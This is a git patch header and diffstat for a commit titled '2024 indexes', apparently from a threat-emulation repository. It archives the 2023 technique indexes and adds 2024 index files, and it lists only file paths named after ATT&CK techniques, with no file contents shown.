From b6a14ab25efd1ff55d648111733f7030ec811d0b Mon Sep 17 00:00:00 2001 
From: 2XXE-SRA <40869774+2XXE-SRA@users.noreply.github.com> Date: Wed, 3 Jan 2024 13:33:08 -0800 Subject: [PATCH] 2024 indexes --- README.md | 70 +- archived/2023/README.md | 84 + .../2023/fs-index-2023}/CHANGELOG.md | 0 .../2023/fs-index-2023}/NOTEBOOK.md | 0 .../2023/fs-index-2023}/REQUIREMENTS.md | 0 .../fs-index-2023-v1.2-summary.csv | 0 .../fs-index-2023}/fs-index-2023-v1.2.yml | 0 .../2023/fs-index-2023}/navigator.json | 0 .../Collection/T1560.001_7zip_v1.yml | 0 .../CommandandControl/T1071.001_httpc2_v3.yml | 0 .../T1071.001_httpsc2_v3.yml | 0 .../T1071.004_dnstxtc2_v3.yml | 0 .../T1102.002_webservicec2_v3.yml | 0 .../CommandandControl/T1105_certutil_v2.yml | 0 .../T1105_tooldownload_v2.yml | 0 .../T1219_remote_assist_v1.yml | 0 .../T1572_personalvpn_v1.yml | 0 .../CredentialAccess/T1003.001_comsvcs_v1.yml | 0 .../T1003.001_procdump_v2.yml | 0 .../CredentialAccess/T1003.001_taskmgr_v1.yml | 0 .../T1003.002_reg_save_all_v1.yml | 0 .../T1003.003_ntds_vssadmin_v1.yml | 0 .../T1003.003_ntdsutil_v2.yml | 0 .../CredentialAccess/T1003.006_dcsync_v2.yml | 0 .../T1555.003_creddumpbrowser_v2.yml | 0 .../T1070.001_cleareventlog_v2.yml | 0 .../DefenseEvasion/T1218.005_mshta_v2.yml | 0 .../DefenseEvasion/T1218.008_odbcconf_v2.yml | 0 .../DefenseEvasion/T1218.010_regsvr32_v3.yml | 0 .../DefenseEvasion/T1218.011_proxy_exe_v1.yml | 0 .../DefenseEvasion/T1218.011_rundll32_v1.yml | 0 .../DefenseEvasion/T1489_netstop_bulk_v2.yml | 0 .../DefenseEvasion/T1548.002_uacbypass_v3.yml | 0 .../T1550.003_passtheticket_v2.yml | 0 .../T1574.001_dll_searchorderhijack_v1.yml | 0 .../Discovery/T1018_nltest_dclist_v1.yml | 0 .../Discovery/T1046_networkscan_v1.yml | 0 .../Discovery/T1087.002_adfind_bulk_v1.yml | 0 .../Discovery/T1087.002_ldap_users_v1.yml | 0 .../T1087.002_net_domainadmins_v1.yml | 0 .../T1087.002_net_user_groups_v1.yml | 0 .../Discovery/T1135_netview_shares_v1.yml | 0 .../Discovery/T1482_nltest_all_v1.yml | 0 .../techniques/Execution/T1106_exe_v1.yml | 0 
.../Execution/T1204.002_macro_hta_v1.yml | 0 .../Execution/T1204.002_macro_v1.yml | 0 .../Exfiltration/T1048.003_httpexfil_v2.yml | 0 .../Exfiltration/T1567.002_mega_rclone_v1.yml | 0 .../Impact/T1021.002_remote_ransomware_v2.yml | 0 .../techniques/Impact/T1486_ransomware_v3.yml | 0 .../T1027.006_html_smuggle_email_v1.yml | 0 .../T1078_simultaneouslogin_v1.yml | 0 .../T1078_suspicious_login_v3.yml | 0 .../T1110.003_externalspray_v2.yml | 0 .../InitialAccess/T1566.001_zipped_iso_v1.yml | 0 .../T1566.001_zipped_macro_v1.yml | 0 .../InitialAccess/T1566.002_spl_iso_v1.yml | 0 .../InitialAccess/T1621_mfa_spam_v1.yml | 0 .../LateralMovement/T1021.001_rdp_v2.yml | 0 .../LateralMovement/T1021.002_smbc2_v1.yml | 0 .../T1021.003_scheduledtask_v2.yml | 0 .../LateralMovement/T1021.003_wmipcc_v1.yml | 0 .../T1057_processdiscovery_remote_v1.yml | 0 .../LateralMovement/T1570_execopy_v1.yml | 0 .../Persistence/T1053.005_schtask_v7.yml | 0 .../T1136.001_newlocaladmin_v1.yml | 0 .../T1543.003_newservice_reg_v1.yml | 0 .../Persistence/T1547.001_runkey_v3.yml | 0 .../2023/h-index-2023}/NOTEBOOK.md | 0 .../2023/h-index-2023}/REQUIREMENTS.md | 0 .../h-index-2023-v1.2-summary.csv | 0 .../2023/h-index-2023}/h-index-2023-v1.2.yml | 0 .../2023/h-index-2023}/navigator.json | 0 .../Collection/T1056.001_keylog_v2.yml | 0 .../Collection/T1560.001_7zip_v1.yml | 0 .../CommandandControl/T1071.001_httpc2_v3.yml | 0 .../T1071.001_httpsc2_v3.yml | 0 .../T1071.004_dnstxtc2_v3.yml | 0 .../T1105_tooldownload_v2.yml | 0 .../T1219_remote_assist_v1.yml | 0 .../T1003.001_creddumpmemory_v3.yml | 0 .../T1003.001_procdump_v2.yml | 0 .../T1003.001_processhacker_v1.yml | 0 .../T1003.002_hashdump_v1.yml | 0 .../T1003.002_reg_save_all_v1.yml | 0 .../T1003.003_ntds_vssadmin_v1.yml | 0 .../T1555.003_creddumpbrowser_v2.yml | 0 .../T1140_certutil_decode_v2.yml | 0 .../DefenseEvasion/T1218.005_mshta_v2.yml | 0 .../DefenseEvasion/T1218.008_odbcconf_v2.yml | 0 .../DefenseEvasion/T1218.010_regsvr32_v3.yml | 0 
.../DefenseEvasion/T1218.011_rundll32_v1.yml | 0 .../DefenseEvasion/T1548.002_uacbypass_v3.yml | 0 .../Discovery/T1046_networkscan_v1.yml | 0 .../Discovery/T1057_processdiscovery_v1.yml | 0 .../Discovery/T1087.001_net_localgroup_v1.yml | 0 .../Discovery/T1087.002_adfind_bulk_v1.yml | 0 .../T1087.002_net_domainadmins_v1.yml | 0 .../T1087.002_setspn_collection_v1.yml | 0 .../Discovery/T1135_netview_shares_v1.yml | 0 .../Discovery/T1482_nltest_all_v1.yml | 0 .../T1518.001_securitydiscovery_v3.yml | 0 .../techniques/Execution/T1106_exe_v1.yml | 0 .../Execution/T1204.002_macro_hta_v1.yml | 0 .../Execution/T1204.002_macro_v1.yml | 0 .../Exfiltration/T1041_httpc2exfil_v2.yml | 0 .../Exfiltration/T1567.002_mega_rclone_v1.yml | 0 .../Impact/T1021.002_remote_ransomware_v2.yml | 0 .../techniques/Impact/T1486_ransomware_v3.yml | 0 .../T1027.006_html_smuggle_email_v1.yml | 0 .../T1566.001_encarchive_macro_v1.yml | 0 .../InitialAccess/T1566.001_zipped_iso_v1.yml | 0 .../InitialAccess/T1566.001_zipped_js_v1.yml | 0 .../InitialAccess/T1566.002_zipped_iso_v1.yml | 0 .../InitialAccess/T1621_mfa_spam_v1.yml | 0 .../LateralMovement/T1021.001_rdp_v2.yml | 0 .../LateralMovement/T1021.003_wmipcc_v1.yml | 0 .../Persistence/T1053.005_schtask_v7.yml | 0 .../T1136.001_newlocaladmin_v1.yml | 0 .../T1543.003_newservice_reg_v1.yml | 0 .../Persistence/T1547.001_runonce_v2.yml | 0 .../T1547.001_startupfolder_v1.yml | 0 .../T1564.002_hide_user_logon_v1.yml | 0 .../2023/rh-index-2023}/NOTEBOOK.md | 0 .../2023/rh-index-2023}/REQUIREMENTS.md | 0 .../2023/rh-index-2023}/navigator.json | 0 .../rh-index-2023-v1.2-summary.csv | 0 .../rh-index-2023}/rh-index-2023-v1.2.yml | 0 .../Collection/T1560.001_7zip_v1.yml | 0 .../CommandandControl/T1071.001_httpc2_v3.yml | 0 .../T1071.001_httpsc2_v3.yml | 0 .../T1071.004_dnstxtc2_v3.yml | 0 .../T1105_tooldownload_v2.yml | 0 .../T1219_remote_assist_v1.yml | 0 .../T1003.001_procdump_v2.yml | 0 .../T1003.001_processhacker_v1.yml | 0 .../T1003.002_hashdump_v1.yml | 0 
.../T1003.003_ntds_vssadmin_v1.yml | 0 .../T1003.003_ntdsutil_v2.yml | 0 .../CredentialAccess/T1003.006_dcsync_v2.yml | 0 .../T1555.003_creddumpbrowser_v2.yml | 0 .../T1558.003_kerberoast_v3.yml | 0 .../DefenseEvasion/T1218.005_mshta_v2.yml | 0 .../DefenseEvasion/T1218.008_odbcconf_v2.yml | 0 .../DefenseEvasion/T1218.010_regsvr32_v3.yml | 0 .../DefenseEvasion/T1218.011_rundll32_v1.yml | 0 .../DefenseEvasion/T1548.002_uacbypass_v3.yml | 0 .../Discovery/T1018_nltest_dclist_v1.yml | 0 .../Discovery/T1046_networkscan_v1.yml | 0 .../Discovery/T1049_sessiongopher_v1.yml | 0 .../Discovery/T1082_systeminfo_v1.yml | 0 .../Discovery/T1087.001_net_localgroup_v1.yml | 0 .../Discovery/T1087.002_ad_explorer_v1.yml | 0 .../T1087.002_net_domainadmins_v1.yml | 0 .../T1087.002_setspn_collection_v1.yml | 0 .../Discovery/T1135_netview_shares_v1.yml | 0 .../Discovery/T1482_nltest_all_v1.yml | 0 .../techniques/Execution/T1059.005_vbs_v1.yml | 0 .../techniques/Execution/T1106_exe_v1.yml | 0 .../Execution/T1204.002_macro_hta_v1.yml | 0 .../Execution/T1204.002_macro_v1.yml | 0 .../Exfiltration/T1567.002_mega_rclone_v1.yml | 0 .../Impact/T1021.002_remote_ransomware_v2.yml | 0 .../techniques/Impact/T1486_ransomware_v3.yml | 0 .../T1027.006_html_smuggle_email_v1.yml | 0 .../T1078_simultaneouslogin_v1.yml | 0 .../T1078_suspicious_login_v3.yml | 0 .../InitialAccess/T1566.001_zipped_iso_v1.yml | 0 .../T1566.001_zipped_macro_v1.yml | 0 .../InitialAccess/T1566.002_zipped_iso_v1.yml | 0 .../InitialAccess/T1566.002_zipped_vbs_v1.yml | 0 .../InitialAccess/T1621_mfa_spam_v1.yml | 0 .../LateralMovement/T1021.001_rdp_v2.yml | 0 .../LateralMovement/T1021.003_wmipcc_v1.yml | 0 .../Persistence/T1053.005_schtask_v7.yml | 0 .../Persistence/T1098.005_aadjoin_v1.yml | 0 .../T1136.001_newlocaladmin_v1.yml | 0 .../T1543.003_newservice_reg_v1.yml | 0 fs-index-2024/CHANGELOG.md | 4 + fs-index-2024/REQUIREMENTS.md | 39 + fs-index-2024/fs-index-2024-v1.0-layer.json | 3152 ++++++++++++++++ 
fs-index-2024/fs-index-2024-v1.0-notebook.md | 500 +++ fs-index-2024/fs-index-2024-v1.0-summary.csv | 51 + fs-index-2024/fs-index-2024-v1.0.yml | 1022 ++++++ .../804512cc-4acf-4be3-a577-ce02ea723fab.yml | 19 + .../be524cb1-12e6-4708-ad57-faf91dfad9de.yml | 20 + .../10f6c44e-b862-4553-bc55-68f6d941bcfb.yml | 20 + .../38064494-0d58-4f48-bce8-b5b7ea7db3da.yml | 18 + .../3ed2f449-744b-48c3-80d2-854386e446a0.yml | 18 + .../43ab96a9-b2c0-442a-b8e4-18e172a1a2ce.yml | 21 + .../9755cd8b-5212-4331-8c6e-afb27404a4b9.yml | 18 + .../314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml | 21 + .../6efcb4c5-d740-41ce-a0dc-b63734813928.yml | 22 + .../79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml | 25 + .../8eeb3c12-dc2e-4791-aff5-e81501312886.yml | 20 + .../95790889-fb7d-42af-a221-3535e4197cde.yml | 22 + .../9a66066b-997b-4ff1-8b4b-c14d982df861.yml | 19 + .../c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml | 20 + .../d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml | 20 + .../16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml | 22 + .../2496e250-5757-482f-9661-daea872395ae.yml | 20 + .../327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml | 22 + .../8c06191e-8c03-4b97-8c18-e28cde39fda5.yml | 25 + .../940be4b6-6081-4808-ab64-aceadfeb3792.yml | 20 + .../cb3ea139-979c-438a-9cf7-611b985f4d61.yml | 20 + .../cbd9070f-03fa-455f-af46-99e8d41146ac.yml | 16 + .../3f120c23-78c0-462f-808f-38ef4f607233.yml | 24 + .../4266c26e-0470-4b97-8dc3-1d24fe35f586.yml | 20 + .../672f8861-c914-4f58-b861-5107ce19f61c.yml | 22 + .../7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml | 23 + .../9064e91a-be78-48a5-9112-28d5701d6d51.yml | 19 + .../bc85f11b-e481-4afb-a5f5-db26e5c07433.yml | 20 + .../a7134d71-dc49-41a8-a309-ec520c96a089.yml | 22 + .../7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml | 19 + .../9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml | 19 + .../b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml | 20 + .../31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml | 20 + .../45591791-541b-4a27-bda9-75e6d78a66f4.yml | 16 + .../72224b97-93d1-4087-8b82-6b4342bf2e09.yml | 20 + 
.../1f9d5363-ddf4-41c3-8bc3-f80595219206.yml | 16 + .../44fd7250-e613-441f-9cb6-5b98c2d71338.yml | 20 + .../609515fe-24e0-4bc2-a069-a3d815e68ec2.yml | 17 + .../97f1da56-79a3-4181-a491-8de9f93b05af.yml | 17 + .../ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml | 16 + .../ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml | 17 + .../0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml | 20 + .../3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml | 23 + .../9b5396f2-6e4a-498a-995e-47e48a99bf76.yml | 24 + .../b74ff4c5-eebf-466b-af85-341b19c4c748.yml | 20 + .../05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml | 23 + .../20a6dace-d801-42f5-b659-6cf91e39d273.yml | 20 + .../5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml | 20 + .../ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml | 20 + .../b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml | 23 + h-index-2024/CHANGELOG.md | 4 + h-index-2024/REQUIREMENTS.md | 38 + h-index-2024/h-index-2024-v1.0-layer.json | 3168 ++++++++++++++++ h-index-2024/h-index-2024-v1.0-notebook.md | 525 +++ h-index-2024/h-index-2024-v1.0-summary.csv | 52 + h-index-2024/h-index-2024-v1.0.yml | 1040 ++++++ .../804512cc-4acf-4be3-a577-ce02ea723fab.yml | 19 + .../be524cb1-12e6-4708-ad57-faf91dfad9de.yml | 20 + .../10f6c44e-b862-4553-bc55-68f6d941bcfb.yml | 20 + .../38064494-0d58-4f48-bce8-b5b7ea7db3da.yml | 18 + .../3ed2f449-744b-48c3-80d2-854386e446a0.yml | 18 + .../9755cd8b-5212-4331-8c6e-afb27404a4b9.yml | 18 + .../314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml | 21 + .../6efcb4c5-d740-41ce-a0dc-b63734813928.yml | 22 + .../79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml | 25 + .../8eeb3c12-dc2e-4791-aff5-e81501312886.yml | 20 + .../95790889-fb7d-42af-a221-3535e4197cde.yml | 22 + .../9a66066b-997b-4ff1-8b4b-c14d982df861.yml | 19 + .../c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml | 20 + .../d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml | 20 + .../16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml | 22 + .../2496e250-5757-482f-9661-daea872395ae.yml | 20 + .../327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml | 22 + .../8c06191e-8c03-4b97-8c18-e28cde39fda5.yml | 25 
+ .../940be4b6-6081-4808-ab64-aceadfeb3792.yml | 20 + .../cb3ea139-979c-438a-9cf7-611b985f4d61.yml | 20 + .../cbd9070f-03fa-455f-af46-99e8d41146ac.yml | 16 + .../3f120c23-78c0-462f-808f-38ef4f607233.yml | 24 + .../4266c26e-0470-4b97-8dc3-1d24fe35f586.yml | 20 + .../672f8861-c914-4f58-b861-5107ce19f61c.yml | 22 + .../7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml | 23 + .../bc85f11b-e481-4afb-a5f5-db26e5c07433.yml | 20 + .../a7134d71-dc49-41a8-a309-ec520c96a089.yml | 22 + .../11b7a86e-4596-4df9-a2a9-705096756d28.yml | 20 + .../7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml | 19 + .../9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml | 19 + .../b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml | 20 + .../31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml | 20 + .../45591791-541b-4a27-bda9-75e6d78a66f4.yml | 16 + .../72224b97-93d1-4087-8b82-6b4342bf2e09.yml | 20 + .../0a348365-1f35-445c-baf0-a6687ddc3f40.yml | 17 + .../1f9d5363-ddf4-41c3-8bc3-f80595219206.yml | 16 + .../609515fe-24e0-4bc2-a069-a3d815e68ec2.yml | 17 + .../98551e7e-1cb8-47c0-a27d-772ddd700617.yml | 17 + .../ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml | 16 + .../ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml | 17 + .../0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml | 20 + .../3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml | 23 + .../9b5396f2-6e4a-498a-995e-47e48a99bf76.yml | 24 + .../b74ff4c5-eebf-466b-af85-341b19c4c748.yml | 20 + .../05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml | 23 + .../0bcb2080-b140-4a1c-9e79-8512a18882d8.yml | 21 + .../20a6dace-d801-42f5-b659-6cf91e39d273.yml | 20 + .../5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml | 20 + .../5dc3f424-8f31-49ee-a822-a77ce20bac43.yml | 20 + .../ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml | 20 + .../b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml | 23 + indexes.json | 7 +- ot-index-2024/CHANGELOG.md | 4 + ot-index-2024/REQUIREMENTS.md | 36 + ot-index-2024/ot-index-2024-v1.0-layer.json | 3184 +++++++++++++++++ ot-index-2024/ot-index-2024-v1.0-notebook.md | 534 +++ ot-index-2024/ot-index-2024-v1.0-summary.csv | 55 + 
ot-index-2024/ot-index-2024-v1.0.yml | 1096 ++++++ .../804512cc-4acf-4be3-a577-ce02ea723fab.yml | 19 + .../be524cb1-12e6-4708-ad57-faf91dfad9de.yml | 20 + .../10f6c44e-b862-4553-bc55-68f6d941bcfb.yml | 20 + .../38064494-0d58-4f48-bce8-b5b7ea7db3da.yml | 18 + .../3ed2f449-744b-48c3-80d2-854386e446a0.yml | 18 + .../9755cd8b-5212-4331-8c6e-afb27404a4b9.yml | 18 + .../08efdcab-54e0-4e06-8f72-b72f23e4fcab.yml | 22 + .../314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml | 21 + .../6efcb4c5-d740-41ce-a0dc-b63734813928.yml | 22 + .../79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml | 25 + .../8eeb3c12-dc2e-4791-aff5-e81501312886.yml | 20 + .../95790889-fb7d-42af-a221-3535e4197cde.yml | 22 + .../9a66066b-997b-4ff1-8b4b-c14d982df861.yml | 19 + .../c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml | 20 + .../d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml | 20 + .../16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml | 22 + .../2496e250-5757-482f-9661-daea872395ae.yml | 20 + .../327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml | 22 + .../8c06191e-8c03-4b97-8c18-e28cde39fda5.yml | 25 + .../940be4b6-6081-4808-ab64-aceadfeb3792.yml | 20 + .../cb3ea139-979c-438a-9cf7-611b985f4d61.yml | 20 + .../cbd9070f-03fa-455f-af46-99e8d41146ac.yml | 16 + .../672f8861-c914-4f58-b861-5107ce19f61c.yml | 22 + .../7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml | 23 + .../bc85f11b-e481-4afb-a5f5-db26e5c07433.yml | 20 + .../a7134d71-dc49-41a8-a309-ec520c96a089.yml | 22 + .../7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml | 19 + .../9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml | 19 + .../b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml | 20 + .../31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml | 20 + .../45591791-541b-4a27-bda9-75e6d78a66f4.yml | 16 + .../72224b97-93d1-4087-8b82-6b4342bf2e09.yml | 20 + .../99c34e6d-c82a-48b8-88ea-7453f98ee561.yml | 20 + .../0a348365-1f35-445c-baf0-a6687ddc3f40.yml | 17 + .../98551e7e-1cb8-47c0-a27d-772ddd700617.yml | 17 + .../ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml | 16 + .../ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml | 17 + 
.../0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml | 20 + .../3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml | 23 + .../9b5396f2-6e4a-498a-995e-47e48a99bf76.yml | 24 + .../0abf446d-3422-4b78-a029-a3485be7be2f.yml | 18 + .../3ac5c6b7-aa22-4359-9506-c675391c8b63.yml | 20 + .../594e3a9f-82c9-4c99-a535-9379d69d2c3b.yml | 18 + .../6652690f-4b0d-4677-90b9-6a4fe3282ed4.yml | 20 + .../85c528ae-0337-45c8-a413-41d59a67b924.yml | 18 + .../9b542d39-29c9-4659-9756-6813426ff41b.yml | 17 + .../b7cefb21-5835-478e-8541-b09d15c11948.yml | 20 + .../db4921c6-c8e6-4bcf-b4b3-dc97f6257608.yml | 20 + .../05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml | 23 + .../20a6dace-d801-42f5-b659-6cf91e39d273.yml | 20 + .../5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml | 20 + .../5dc3f424-8f31-49ee-a822-a77ce20bac43.yml | 20 + .../ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml | 20 + .../b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml | 23 + rh-index-2024/CHANGELOG.md | 4 + rh-index-2024/REQUIREMENTS.md | 37 + rh-index-2024/rh-index-2024-v1.0-layer.json | 3156 ++++++++++++++++ rh-index-2024/rh-index-2024-v1.0-notebook.md | 425 +++ rh-index-2024/rh-index-2024-v1.0-summary.csv | 51 + rh-index-2024/rh-index-2024-v1.0.yml | 1020 ++++++ .../804512cc-4acf-4be3-a577-ce02ea723fab.yml | 19 + .../be524cb1-12e6-4708-ad57-faf91dfad9de.yml | 20 + .../10f6c44e-b862-4553-bc55-68f6d941bcfb.yml | 20 + .../38064494-0d58-4f48-bce8-b5b7ea7db3da.yml | 18 + .../3ed2f449-744b-48c3-80d2-854386e446a0.yml | 18 + .../9755cd8b-5212-4331-8c6e-afb27404a4b9.yml | 18 + .../314b4f6a-b27a-4a55-af5c-c98bc3146dd8.yml | 21 + .../79640171-eeb3-44c2-9d9e-cf29c7f57af1.yml | 25 + .../8eeb3c12-dc2e-4791-aff5-e81501312886.yml | 20 + .../95790889-fb7d-42af-a221-3535e4197cde.yml | 22 + .../9a66066b-997b-4ff1-8b4b-c14d982df861.yml | 19 + .../c13ac2bf-6803-4525-9c5e-fda7b1b7fcb7.yml | 20 + .../d6dd145b-c7ae-4f79-bc07-179a012a7a07.yml | 20 + .../16ed92a3-b979-464b-bc79-fadb43e3c6a1.yml | 22 + .../2496e250-5757-482f-9661-daea872395ae.yml | 20 + 
.../327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml | 22 + .../8c06191e-8c03-4b97-8c18-e28cde39fda5.yml | 25 + .../940be4b6-6081-4808-ab64-aceadfeb3792.yml | 20 + .../9dbfedcf-893f-4086-b428-2f3bc73c96a5.yml | 20 + .../cb3ea139-979c-438a-9cf7-611b985f4d61.yml | 20 + .../cbd9070f-03fa-455f-af46-99e8d41146ac.yml | 16 + .../3f120c23-78c0-462f-808f-38ef4f607233.yml | 24 + .../4266c26e-0470-4b97-8dc3-1d24fe35f586.yml | 20 + .../672f8861-c914-4f58-b861-5107ce19f61c.yml | 22 + .../7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml | 23 + .../9064e91a-be78-48a5-9112-28d5701d6d51.yml | 19 + .../bc85f11b-e481-4afb-a5f5-db26e5c07433.yml | 20 + .../a7134d71-dc49-41a8-a309-ec520c96a089.yml | 22 + .../11b7a86e-4596-4df9-a2a9-705096756d28.yml | 20 + .../7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml | 19 + .../9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml | 19 + .../b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml | 20 + .../31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml | 20 + .../45591791-541b-4a27-bda9-75e6d78a66f4.yml | 16 + .../72224b97-93d1-4087-8b82-6b4342bf2e09.yml | 20 + .../1f9d5363-ddf4-41c3-8bc3-f80595219206.yml | 16 + .../609515fe-24e0-4bc2-a069-a3d815e68ec2.yml | 17 + .../97f1da56-79a3-4181-a491-8de9f93b05af.yml | 17 + .../ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml | 16 + .../ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml | 17 + .../0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml | 20 + .../3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml | 23 + .../9b5396f2-6e4a-498a-995e-47e48a99bf76.yml | 24 + .../b74ff4c5-eebf-466b-af85-341b19c4c748.yml | 20 + .../05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml | 23 + .../0bcb2080-b140-4a1c-9e79-8512a18882d8.yml | 21 + .../20a6dace-d801-42f5-b659-6cf91e39d273.yml | 20 + .../5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml | 20 + .../ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml | 20 + .../b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml | 23 + 408 files changed, 23447 insertions(+), 32 deletions(-) create mode 100644 archived/2023/README.md rename {fs-index-2023 => archived/2023/fs-index-2023}/CHANGELOG.md (100%) rename 
{fs-index-2023 => archived/2023/fs-index-2023}/NOTEBOOK.md (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/REQUIREMENTS.md (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/fs-index-2023-v1.2-summary.csv (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/fs-index-2023-v1.2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/navigator.json (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Collection/T1560.001_7zip_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1071.001_httpc2_v3.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1071.001_httpsc2_v3.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1071.004_dnstxtc2_v3.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1102.002_webservicec2_v3.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1105_certutil_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1105_tooldownload_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1219_remote_assist_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CommandandControl/T1572_personalvpn_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.001_comsvcs_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.001_procdump_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.001_taskmgr_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.002_reg_save_all_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.003_ntds_vssadmin_v1.yml 
(100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.003_ntdsutil_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1003.006_dcsync_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/CredentialAccess/T1555.003_creddumpbrowser_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1070.001_cleareventlog_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.005_mshta_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.008_odbcconf_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.010_regsvr32_v3.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.011_proxy_exe_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1218.011_rundll32_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1489_netstop_bulk_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1548.002_uacbypass_v3.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1550.003_passtheticket_v2.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/DefenseEvasion/T1574.001_dll_searchorderhijack_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1018_nltest_dclist_v1.yml (100%) rename {fs-index-2023 => archived/2023/fs-index-2023}/techniques/Discovery/T1046_networkscan_v1.yml 